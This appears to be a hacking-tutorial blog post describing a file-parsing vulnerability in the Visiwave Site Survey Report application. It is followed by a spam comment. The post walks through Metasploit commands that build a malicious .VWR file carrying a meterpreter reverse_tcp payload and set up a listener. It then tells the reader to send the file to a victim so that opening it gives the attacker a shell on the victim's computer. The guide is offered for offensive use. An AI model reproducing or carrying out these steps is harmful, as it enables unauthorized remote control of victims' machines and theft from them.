Hack Remote PC using Visiwave VWR File Parsing Vulnerability

This module exploits a vulnerability found in Visiwave Site Survey Report application. When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the ‘Type’ property (valid ones include ‘Properties’, ‘Title Page’, ‘Details’, ‘Graph’, ‘Table’, ‘Text’, ‘Image’), but if a match isn’t found, the function that’s supposed to handle this routine ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10] instruction. This allows attackers to overwrite it with any arbitrary value, and results code execution. A patch is available at visiwave.com; the fix is done by XORing the return value as null if no match is found, and then it is validated before use. NOTE: During installation, the application will register two file handles, VWS and VWR and allows a victim user to ‘double click’ the malicious VWR file and execute code. This module was also built to bypass ASLR and DEP.

Exploit Targets

Visiwave 2.1.8.150

Windows XP SP2

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/visiwave_vwr_type

Msf exploit (visiwave_vwr_type)>set payload windows/meterpreter/reverse_tcp

Msf exploit (visiwave_vwr_type)>set lhost 192.168.1.2 (IP of Local Host)

Msf exploit (visiwave_vwr_type)>exploit

After we successfully generate the malicious File, it will stored on your local computer

/root/.msf4/local/msf.vwr

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.2

exploit

Now send your msf.vwr files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

1 Comment Hack Remote PC using Visiwave VWR File Parsing Vulnerability

  1. exclusivehack

    Thanks for a marvelous posting! I genuinely enjoyed reading it, you could be a great author. I will be sure to bookmark your blog and definitely will come back in the future. I want to encourage yourself to continue your great posts, have a nice afternoon!

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *